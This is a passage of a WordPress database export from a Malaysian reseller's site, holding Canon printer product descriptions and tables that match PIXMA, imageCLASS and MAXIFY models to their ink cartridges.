width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS307</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5070</p></td><td width=\"208\"><p>CLI-771 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5170</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA TS8270</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9170</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr></tbody></table>','Canon','','inherit','closed','closed','','1449-revision-v1','','','2019-09-24 17:44:45','2019-09-24 09:44:45','',1449,'https://bintara.com.my/blog/2019/09/24/1449-revision-v1/',0,'revision','',0),(3313,1,'2019-09-24 17:20:48','2019-09-24 09:20:48','<h2>Injet Printers :-</h2>		\n			<h4>PIXMA E560 / E560R</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Advanced Wireless All-In-One with Auto DuplexÂ Printing for Low-Cost Printing</p><p>The Ink Efficient E560 / E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.</p><p>Available in Black and Red.</p><p>Print, Scan, Copy</p><p>ISO Standard print speed (A4): up to 9.9ipm black / 5.7ipm colour</p><p>Hi-speed USB 2.0, WiFi</p><p>Recommended print volume: 80 - 400 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA E4270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing</p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.</p><p>Print, Scan, Copy, Fax</p><p>ISO standard print speed (A4): 8.8ipm black / 4.4ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct</p><p>Recommended print volume: 50 - 200 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA TS9570</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>A3 Wireless Photo Printer with Large 4.3â€ Touch-Screen and Auto Document Feeder</p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 80 - 300 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA TS8270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Wireless Photo All-In-One with Large 4.3â€ Touch-Screen and Auto Duplex Printing</p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.</p><p>Available in Black, Red and White.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 30 - 100 pages</p><center></center><center></center><center></center><center></center><center></center><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G2010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G4010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost.</p><p>Print, Scan, Copy and Fax</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G1010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Printer for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print</p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) / 5.0ipm (colour)</p><p>Photo Speed (4 x 6\"): 60sec. (borderless)</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G3010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h2>Laser Printers :-</h2>		\n			<h4>imageCLASS LBP113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact with wireless connectivity</strong></p><p>Simple to operate and compact in size, the ideal choice for your printing needs.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Connectivity.</li></ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF269dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)</strong></p>\nEnjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 28ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 5.2 sec</li>\n 	<li>Max. paper input capacity: 251 sheets</li>\n 	<li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li>\n</ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF266dn</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>The Multifunction printing solution with Mobile Printing and Network</strong></p>\nFeaturing Network printing and SEND technology, MF266dn is the productive choice for your business operations.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 28ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 5.2 sec</li>\n 	<li>Max. paper input capacity: 251 sheets</li>\n 	<li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li>\n</ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges</strong></p>\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\n<ul>\n 	<li>Print, Scan, Copy</li>\n 	<li>Print Speed (A4): Up to 22ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 6.5 sec</li>\n 	<li>Max. paper input capacity: Up to 150 sheets</li>\n 	<li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact All-in-One with wireless connectivity</strong></p>\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.\n<ul>\n 	<li>Print, Scan, Copy</li>\n 	<li>Print Speed (A4): Up to 22ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 6.5 sec</li>\n 	<li>Max. paper input capacity: Up to 150 sheets</li>\n 	<li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>\n			<h4>imageCLASS LBP913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact with wireless connectivity, bundled with 3 cartridges</strong></p>\nKeep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\n<ul>\n 	<li>Print</li>\n 	<li>Print Speed (A4): Up to 22ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>First Print Out Time (A4): Approx. 6.5 sec</li>\n 	<li>Print Resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li>\n 	<li>Mobile Printing</li>\n</ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF525x</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\nSmarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 43ppm</li>\n 	<li>Recommended monthly print volume: 2,000 - 7,500 pages</li>\n 	<li>FPOT: 6.2secs. (A4)</li>\n 	<li>Max. paper input capacity: Up to 2,300 sheets</li>\n 	<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF426dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact 4-in-1 Black and White Multifunction for the smart business</strong></p>\nWith cutting-edge features, the MF426dw is set to boost work productivity in the modern office.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 38ppm</li>\n 	<li>Recommended monthly print volume: 750 - 4,000 pages</li>\n 	<li>FPOT: 5.5secs. (A4)</li>\n 	<li>Max. paper input capacity: Up to 900 sheets</li>\n 	<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>		\n			<h3>Cartridge Printers :-</h3>		\n		<table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>imagePROGRAF PRO-500</p></td><td width=\"208\"><p>Maintenance Cartridge MC-20</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY iB4170</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5070</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5170</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5370</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5470</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA E3170</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E410</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA E4270</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E470</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E477</p></td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td 